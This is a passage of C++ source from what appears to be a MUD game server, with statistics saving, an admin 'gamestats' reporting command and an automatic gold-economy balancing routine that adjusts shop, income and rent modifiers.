gold_modifier[GOLD_COMM].getVal(),
gold_modifier[GOLD_HOSPITAL].getVal(),
gold_modifier[GOLD_GAMBLE].getVal(),
gold_modifier[GOLD_RENT].getVal(),
gold_modifier[GOLD_TITHE].getVal(),
gold_modifier[GOLD_SHOP_FOOD].getVal(),
gold_modifier[<API key>].getVal(),
gold_modifier[GOLD_SHOP_SYMBOL].getVal(),
gold_modifier[GOLD_SHOP_ARMOR].getVal(),
gold_modifier[GOLD_SHOP_WEAPON].getVal(),
gold_modifier[GOLD_SHOP_PET].getVal(),
gold_modifier[GOLD_SHOP_RESPONSES].getVal(),
gold_modifier[GOLD_DUMP].getVal());
fprintf(fp, "%f\n", stats.equip);
for (i = 0; i < 50; i++) {
for (j = 0; j < MAX_CLASSES; j++) {
fprintf(fp, "%d %ld ", stats.levels[j][i], stats.time_levels[j][i]);
}
fprintf(fp, "\n");
}
fprintf(fp, "%ld\n", (long) stats.first_login);
fclose(fp);
} else {
vlogf(LOG_BUG, format("Error writing %s") % File::STATS);
}
}
void TBeing::doGamestats(const sstring &arg)
{
sstring buf, buf2;
int lev, i;
sstring str;
if (powerCheck(POWER_GAMESTATS))
return;
buf=arg.word(0);
buf2=arg.word(1);
if(buf.empty()){
sendTo("Syntax: gamestats <attributes | combat | equipment | levels | trivia | statistics>\n\r");
return;
} else if (is_abbrev(buf, "attributes")) {
int temp_stat = getStat(STAT_CURRENT, STAT_STR);
double plot1 = 0;
double plot2 = 0;
double curve;
if(buf2.empty()){
curve = 1.4;
} else
curve = convertTo<float>(buf2);
for(int tmpint = 5; tmpint <= 205; tmpint += 5) {
setStat(STAT_CURRENT, STAT_STR, tmpint);
plot1 = plotStat(STAT_CURRENT, STAT_STR, .80, 1.25, 1.00, curve);
plot2 = plotStat(STAT_CURRENT, STAT_STR, 0.0, 100.0, 50.0, curve);
buf = format("Stat Value: %5.2f Plot1: %5.2f Plot2: %5.2f%c\n\r") % (double)tmpint % plot1 % plot2 % '%';
sendTo(buf);
}
setStat(STAT_CURRENT, STAT_STR, temp_stat);
return;
} else if (is_abbrev(buf, "combat")) {
int tot_dam = stats.damage[PC_STAT] + stats.damage[MOB_STAT];
buf = format("Total damage taken : %d\n\r") % tot_dam;
str += buf;
buf = format("\tMob damage taken : %ld (%5.2f%c)\n\r") %
stats.damage[MOB_STAT] % (tot_dam ? (100.0 * stats.damage[MOB_STAT] / tot_dam) : 0) % '%';
str += buf;
buf = format("\tPC damage taken : %ld (%5.2f%c)\n\r") %
stats.damage[PC_STAT] % (tot_dam ? (100.0 * stats.damage[PC_STAT] / tot_dam) : 0) % '%';
str += buf;
tot_dam = stats.combat_damage[PC_STAT] + stats.combat_damage[MOB_STAT];
buf = format("Combat damage only : %d\n\r") % tot_dam;
str += buf;
buf = format("\tMob combat damage taken : %ld (%5.2f%c)\n\r") %
stats.combat_damage[MOB_STAT] % (tot_dam ? (100.0 * stats.combat_damage[MOB_STAT] / tot_dam) : 0) % '%';
str += buf;
buf = format("\tPC combat damage taken : %ld (%5.2f%c)\n\r") %
stats.combat_damage[PC_STAT] % (tot_dam ? (100.0 * stats.combat_damage[PC_STAT] / tot_dam) : 0) % '%';
str += buf;
int tot_ac = stats.ac_absorb[MOB_STAT] + stats.ac_absorb[PC_STAT];
buf = format("AC damage absorbed : %d\n\r") % tot_ac;
str += buf;
int mob_dam = stats.ac_absorb[MOB_STAT] + stats.combat_damage[MOB_STAT];
buf = format("\tMob AC absorb : %ld (%5.2f%c of all abs) (%5.2f%c of mob ComDam)\n\r") %
stats.ac_absorb[MOB_STAT] % (tot_ac ? stats.ac_absorb[MOB_STAT] * 100.0 / tot_ac : 0) % '%' %
(mob_dam ? stats.ac_absorb[MOB_STAT] * 100.0 / mob_dam : 0) % '%';
str += buf;
int pc_dam = stats.ac_absorb[PC_STAT] + stats.combat_damage[PC_STAT];
buf = format("\tPC AC absorb : %ld (%5.2f%c of all abs) (%5.2f%c of PC ComDam)\n\r") %
stats.ac_absorb[PC_STAT] % (tot_ac ? stats.ac_absorb[PC_STAT] * 100.0 / tot_ac : 0) % '%' %
(pc_dam ? stats.ac_absorb[PC_STAT] * 100.0 / pc_dam : 0) % '%';
str += buf;
buf = format("Current absorbtion constants : TBeing %d, PC %d\n\r\n\r") %
stats.<API key>[MOB_STAT] %
stats.<API key>[PC_STAT];
str += buf;
long tot_blows = stats.combat_blows[PC_STAT] + stats.combat_blows[MOB_STAT];
buf = format("Total Combat blows : %ld\n\r") % tot_blows;
str += buf;
buf = format("\tMob combat blows : %ld (%5.2f%c)\n\r") %
stats.combat_blows[MOB_STAT] %
(tot_blows ? (100.0 * stats.combat_blows[MOB_STAT] / tot_blows) : 0) %
'%';
str += buf;
buf = format("\tPC combat blows : %ld (%5.2f%c)\n\r") %
stats.combat_blows[PC_STAT] %
(tot_blows ? (100.0 * stats.combat_blows[PC_STAT] / tot_blows) : 0) %
'%';
str += buf;
long tot_hits = stats.combat_hits[PC_STAT] + stats.combat_hits[MOB_STAT];
buf = format("Total Combat hits : %ld (%5.2f%c)\n\r") %
tot_hits % (tot_blows == 0 ? 0.0 : (100.0 * tot_hits / tot_blows)) % '%';
str += buf;
buf = format("\tMob combat hits : %ld (%5.2f%c) (%5.2f%c hit rate)\n\r") %
stats.combat_hits[MOB_STAT] % (tot_hits ? (100.0 * stats.combat_hits[MOB_STAT] / tot_hits) : 0) % '%' %
(stats.combat_blows[MOB_STAT] ? stats.combat_hits[MOB_STAT] * 100.0 / stats.combat_blows[MOB_STAT] : 0) % '%';
str += buf;
buf = format("\tPC combat hits : %ld (%5.2f%c) (%5.2f%c hit rate)\n\r") %
stats.combat_hits[PC_STAT] % (tot_hits ? (100.0 * stats.combat_hits[PC_STAT] / tot_hits) : 0 ) % '%' %
(stats.combat_blows[PC_STAT] ? stats.combat_hits[PC_STAT] * 100.0 / stats.combat_blows[PC_STAT] : 0) % '%';
str += buf;
int tot_lev = stats.combat_level[PC_STAT] + stats.combat_level[MOB_STAT];
buf = format("Average Combat level : %5.2f\n\r") %
(tot_blows ? ((double) tot_lev / (double) tot_blows) : 0.0);
str += buf;
buf = format("\tMob combat level : %5.2f\n\r") %
(stats.combat_blows[MOB_STAT] ? ((double) stats.combat_level[MOB_STAT] / (double) stats.combat_blows[MOB_STAT]) : 0.0);
str += buf;
buf = format("\tPC combat level : %5.2f\n\r") %
(stats.combat_blows[PC_STAT] ? ((double) stats.combat_level[PC_STAT] / (double) stats.combat_blows[PC_STAT]) : 0.0);
str += buf;
buf = format("Average Combat damage : %5.2f\n\r") %
(tot_hits ? ((double) tot_dam / (double) tot_hits) : 0.0);
str += buf;
buf = format("\tMob avg. combat dam. : %5.2f\n\r") %
(stats.combat_hits[MOB_STAT] ? ((double) stats.combat_damage[MOB_STAT] / (double) stats.combat_hits[MOB_STAT]) : 0.0);
str += buf;
buf = format("\tPC avg. combat dam. : %5.2f\n\r") %
(stats.combat_hits[PC_STAT] ? ((double) stats.combat_damage[PC_STAT] / (double) stats.combat_hits[PC_STAT]) : 0.0);
str += buf;
buf = format("Total crit-success checks : %ld (%5.2f%c of hits)\n\r") %
stats.combat_crit_suc %
(tot_hits == 0 ? 0.0 :
(100.0 * stats.combat_crit_suc / tot_hits)) % '%';
str += buf;
buf = format("Total crit-fail checks : %ld (%5.2f%c of misses)\n\r") %
stats.combat_crit_fail %
((tot_blows - tot_hits) == 0 ? 0.0 :
(100.0 * stats.combat_crit_fail / (tot_blows - tot_hits))) % '%';
str += buf;
buf = format("Total crit-success passes : %ld (%5.2f%c of hits)\n\r") %
stats.<API key> %
(tot_hits == 0 ? 0.0 :
(100.0 * stats.<API key> / tot_hits)) % '%';
str += buf;
buf = format("Total crit-fail passes : %ld (%5.2f%c of misses)\n\r") %
stats.<API key> %
((tot_blows - tot_hits) == 0 ? 0.0 :
(100.0 * stats.<API key> / (tot_blows - tot_hits))) % '%';
str += buf;
str += "\n\r";
buf = format("Mobiles have tried to aggro : %d times.\n\r") % stats.aggro_attempts;
str += buf;
buf = format("Mobiles have aggro'd : %d times.\n\r") % stats.aggro_successes;
str += buf;
if (desc)
desc->page_string(str, SHOWNOW_NO, ALLOWREP_YES);
return;
} else if (is_abbrev(buf, "equipment")) {
sendTo(format("Current Equipment Load Modifier : %4.2f\n\r") % stats.equip);
sendTo(format("Current Max-Exist Modifier : %4.2f\n\r") % stats.max_exist);
sendTo(format("Current Mob-Money Modifier : %4.2f\n\r") % gold_modifier[GOLD_INCOME].getVal());
sendTo(format("Current Mob-XP Modifier : %4.2f\n\r") % stats.xp_modif);
sendTo(format("Current Damage Modifier : %4.2f\n\r") % stats.damage_modifier);
return;
} else if (is_abbrev(buf, "trivia")) {
sendTo(format("Average HP regen : %4.2f (attempts : %d)\n\r") % (stats.hit_gained_attempts == 0 ? 0.0 :
((float) stats.hit_gained / (float) stats.hit_gained_attempts)) %
stats.hit_gained_attempts);
sendTo(format("Average MV regen : %4.2f (attempts : %d)\n\r") % (stats.<API key> == 0 ? 0.0 :
((float) stats.move_gained / (float) stats.<API key>)) %
stats.<API key>);
sendTo(format("Average mana regen : %4.2f (attempts : %d)\n\r") % (stats.<API key> == 0 ? 0.0 :
((float) stats.mana_gained / (float) stats.<API key>)) %
stats.<API key>);
sendTo(format("Average piety regen : %4.2f (attempts : %d)\n\r") % (stats.<API key> == 0 ? 0.0 :
(stats.piety_gained / (float) stats.<API key>)) %
stats.<API key>);
return;
} else if (is_abbrev(buf, "levels")) {
if(buf2.empty()){
sendTo("Syntax : gamestats levels <level>\n\r");
return;
}
lev = convertTo<int>(buf2);
if ((lev >= 0) && (lev < 70)) {
sendTo(format("Mobile Deaths for level %d, %ld\n\r") % lev % stats.deaths[lev][1]);
sendTo(format("PC Deaths for level %d, %ld\n\r") % lev % stats.deaths[lev][0]);
if (lev >= 1 && lev <= 50) {
sendTo("PC Leveling Data:\n\r");
unsigned int factor = secs_to_level(lev);
sendTo(format("Desired leveling time: %s\n\r") %
secsToString(factor));
for (i=0;i<MAX_CLASSES;i++) {
time_t factor = 0;
if (stats.levels[i][lev-1])
factor = SECS_PER_REAL_MIN * stats.time_levels[i][lev-1] / stats.levels[i][lev-1];
sendTo(format("Class: %-10.10s : number %3d, avg. time: %s\n\r") %
classInfo[i].name % stats.levels[i][lev-1] %
secsToString(factor));
}
}
return;
} else {
sendTo("Please use a level from 0 - 70 in your level checking.\n\r");
return;
}
} else if (is_abbrev(buf, "statistics")) {
systask->AddTask(this, SYSTEM_STATISTICS, "");
return;
}
sendTo("Syntax: gamestats <attributes | combat | equipment | levels | trivia | statistics>\n\r");
return;
}
int getNetGold(moneyTypeT mtt)
{
int net_gold = 0;
int i;
for (i = 0; i < MAX_MORT; i++)
net_gold += gold_statistics[mtt][i];
return net_gold;
}
unsigned int getPosGold(moneyTypeT mtt)
{
unsigned int pos_gold = 0;
int i;
for (i = 0; i < MAX_MORT; i++)
pos_gold += gold_positive[mtt][i];
return pos_gold;
}
int getNetGoldGlobal()
{
int net_gold = 0;
int i;
for (i = 0; i < MAX_MORT; i++)
net_gold += gold_statistics[GOLD_INCOME][i] +
gold_statistics[GOLD_COMM][i] +
gold_statistics[GOLD_RENT][i] +
gold_statistics[GOLD_REPAIR][i] +
gold_statistics[GOLD_HOSPITAL][i] +
gold_statistics[GOLD_GAMBLE][i] +
gold_statistics[GOLD_TITHE][i] +
gold_statistics[GOLD_DUMP][i] +
gold_statistics[GOLD_SHOP_FOOD][i] +
gold_statistics[<API key>][i] +
gold_statistics[GOLD_SHOP_SYMBOL][i] +
gold_statistics[GOLD_SHOP_ARMOR][i] +
gold_statistics[GOLD_SHOP_WEAPON][i] +
gold_statistics[GOLD_SHOP_RESPONSES][i] +
gold_statistics[GOLD_SHOP_PET][i] +
gold_statistics[GOLD_SHOP][i];
return net_gold;
}
unsigned int getPosGoldGlobal()
{
unsigned int pos_gold = 0;
int i;
for (i = 0; i < MAX_MORT; i++)
pos_gold += gold_positive[GOLD_INCOME][i] +
gold_positive[GOLD_COMM][i] +
gold_positive[GOLD_RENT][i] +
gold_positive[GOLD_REPAIR][i] +
gold_positive[GOLD_HOSPITAL][i] +
gold_positive[GOLD_GAMBLE][i] +
gold_positive[GOLD_DUMP][i] +
gold_positive[GOLD_TITHE][i] +
gold_positive[GOLD_SHOP_FOOD][i] +
gold_positive[<API key>][i] +
gold_positive[GOLD_SHOP_SYMBOL][i] +
gold_positive[GOLD_SHOP_ARMOR][i] +
gold_positive[GOLD_SHOP_WEAPON][i] +
gold_positive[GOLD_SHOP_PET][i] +
gold_positive[GOLD_SHOP_RESPONSES][i] +
gold_positive[GOLD_SHOP][i];
return pos_gold;
}
// we exclude the shop_pet value in this since it's off-budget, and the
// shop modifier doesn't factor into that price anyways
int getNetGoldShops()
{
int net_gold = 0;
int i;
for (i = 0; i < MAX_MORT; i++)
net_gold += gold_statistics[GOLD_SHOP_FOOD][i] +
gold_statistics[<API key>][i] +
gold_statistics[GOLD_SHOP_SYMBOL][i] +
gold_statistics[GOLD_SHOP_ARMOR][i] +
gold_statistics[GOLD_SHOP_WEAPON][i] +
gold_statistics[GOLD_SHOP_RESPONSES][i] +
gold_statistics[GOLD_SHOP][i];
return net_gold;
}
unsigned int getPosGoldShops()
{
unsigned int pos_gold = 0;
int i;
for (i = 0; i < MAX_MORT; i++)
pos_gold += gold_positive[GOLD_SHOP_FOOD][i] +
gold_positive[<API key>][i] +
gold_positive[GOLD_SHOP_SYMBOL][i] +
gold_positive[GOLD_SHOP_ARMOR][i] +
gold_positive[GOLD_SHOP_WEAPON][i] +
gold_positive[GOLD_SHOP_RESPONSES][i] +
gold_positive[GOLD_SHOP][i];
return pos_gold;
}
// we don't want income values floating high because PCs spend money
// on bad things (rent, pets)
int getNetGoldBudget()
{
int net_gold = 0;
int i;
for (i = 0; i < MAX_MORT; i++)
net_gold += gold_statistics[GOLD_INCOME][i] +
gold_statistics[GOLD_COMM][i] +
gold_statistics[GOLD_REPAIR][i] +
gold_statistics[GOLD_HOSPITAL][i] +
gold_statistics[GOLD_GAMBLE][i] +
gold_statistics[GOLD_TITHE][i] +
gold_statistics[GOLD_DUMP][i] +
gold_statistics[GOLD_SHOP_FOOD][i] +
gold_statistics[<API key>][i] +
gold_statistics[GOLD_SHOP_SYMBOL][i] +
gold_statistics[GOLD_SHOP_ARMOR][i] +
gold_statistics[GOLD_SHOP_WEAPON][i] +
gold_statistics[GOLD_SHOP_RESPONSES][i] +
gold_statistics[GOLD_SHOP][i];
return net_gold;
}
unsigned int getPosGoldBudget()
{
unsigned int pos_gold = 0;
int i;
for (i = 0; i < MAX_MORT; i++)
pos_gold += gold_positive[GOLD_INCOME][i] +
gold_positive[GOLD_COMM][i] +
gold_positive[GOLD_REPAIR][i] +
gold_positive[GOLD_HOSPITAL][i] +
gold_positive[GOLD_GAMBLE][i] +
gold_positive[GOLD_DUMP][i] +
gold_positive[GOLD_TITHE][i] +
gold_positive[GOLD_SHOP_FOOD][i] +
gold_positive[<API key>][i] +
gold_positive[GOLD_SHOP_SYMBOL][i] +
gold_positive[GOLD_SHOP_ARMOR][i] +
gold_positive[GOLD_SHOP_WEAPON][i] +
gold_positive[GOLD_SHOP_RESPONSES][i] +
gold_positive[GOLD_SHOP][i];
return pos_gold;
}
// procCheckGoldStats
procCheckGoldStats::procCheckGoldStats(const int &p)
{
trigger_pulse=p;
name="procCheckGoldStats";
}
void procCheckGoldStats::run(const TPulse &) const
{
// insure we have enough data to take accurate reading
unsigned int pos_gold = getPosGoldGlobal();
if (pos_gold < 5000000U)
// if (pos_gold < 2000000U)
return;
int net_gold = getNetGoldGlobal();
int net_gold_all_shops = getNetGoldShops();
int net_gold_budget = getNetGoldBudget();
unsigned int pos_gold_all_shops = getPosGoldShops();
unsigned int pos_gold_budget = getPosGoldBudget();
bool should_reset = false;
// want shops to make money (roughly 5% of total)
if (net_gold_all_shops > 0) {
// shops are giving out too much money
gold_modifier[GOLD_SHOP] -= 0.01;
// vlogf(LOG_BUG, format("ECONOMY: shop modifier lowered. %d %u %.2f") % net_gold_all_shops % pos_gold_all_shops % gold_modifier[GOLD_SHOP].getVal());
should_reset = true;
} else if ((unsigned int) -net_gold_all_shops > pos_gold_all_shops/10) {
// shops are making too much money
gold_modifier[GOLD_SHOP] += 0.01;
// vlogf(LOG_BUG, format("ECONOMY: shop modifier raised. %d %u %.2f") % net_gold_all_shops % pos_gold_all_shops % gold_modifier[GOLD_SHOP].getVal());
should_reset = true;
}
// overall, would like players to be gaining slightly on gold (2% target)
float target_income = 0.02;
if ((unsigned int) net_gold_budget < ((target_income - 0.03) * pos_gold_budget)) {
// players losing money
gold_modifier[GOLD_INCOME] += 0.01;
// vlogf(LOG_BUG, format("ECONOMY: income modifier raised. %d %u %.2f") % net_gold_budget % pos_gold_budget % gold_modifier[GOLD_INCOME].getVal());
should_reset = true;
} else if ((unsigned int) net_gold_budget > ((target_income + 0.03) * pos_gold_budget)) {
// players making too much
gold_modifier[GOLD_INCOME] -= 0.01;
// vlogf(LOG_BUG, format("ECONOMY: income modifier lowered. %d %u %.2f") % net_gold_budget % pos_gold_budget % gold_modifier[GOLD_INCOME].getVal());
should_reset = true;
}
// good drain:
// components and symbol purchasing
// armor and weapon purchasing (upgrading)
// purchases from response mobs (in general, components)
// money spent repairing eq
// food purchases
// income money : unrecovered corpse?
// rent costs are really off budget
// we definitely do not want rent to be significant part of economy
float target_rent = 0.10;
// get the drain associated with renting
int rent_drain = getPosGold(GOLD_RENT) - getNetGold(GOLD_RENT);
// realize that we are flucuating these costs based on these costs
// which is rather problematic
// we essentially want the "true" rent drain
int adj_rent = (int) (rent_drain / gold_modifier[GOLD_RENT].getVal());
int total_drain = pos_gold - net_gold;
if (adj_rent < (int) ((target_rent - .05) * total_drain)) {
// rent is too small a drain
// reduce the cost of renting so that folks will be able to rent more
gold_modifier[GOLD_RENT] -= 0.01;
should_reset = true;
} else if (adj_rent > (int) ((target_rent + .05) * total_drain)) {
// rent is too large a drain
// raise the cost of renting so that folks will be able to rent less
gold_modifier[GOLD_RENT] += 0.01;
should_reset = true;
}
#if 0
// desire money from eq be no more than 25% of total
// that is, most money comes from raw loads on mobs (commods, gold, etc)
const double target_eq = 0.25;
unsigned int pos_gold_shop_arm = getPosGold(GOLD_SHOP_ARMOR);
unsigned int pos_gold_shop_weap = getPosGold(GOLD_SHOP_WEAPON);
double eq_factor = (double) (pos_gold_shop_arm + pos_gold_shop_weap) /
pos_gold;
if (eq_factor < (target_eq - 0.05)) {
// too little money from EQ
stats.equip += 0.01;
should_reset = true;
} else if (eq_factor > (target_eq + 0.05)) {
// too much money from EQ
stats.equip -= 0.01;
should_reset = true;
}
#endif
if (should_reset) {
memset(&gold_statistics, 0, sizeof(gold_statistics));
memset(&gold_positive, 0, sizeof(gold_positive));
save_game_stats();
}
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.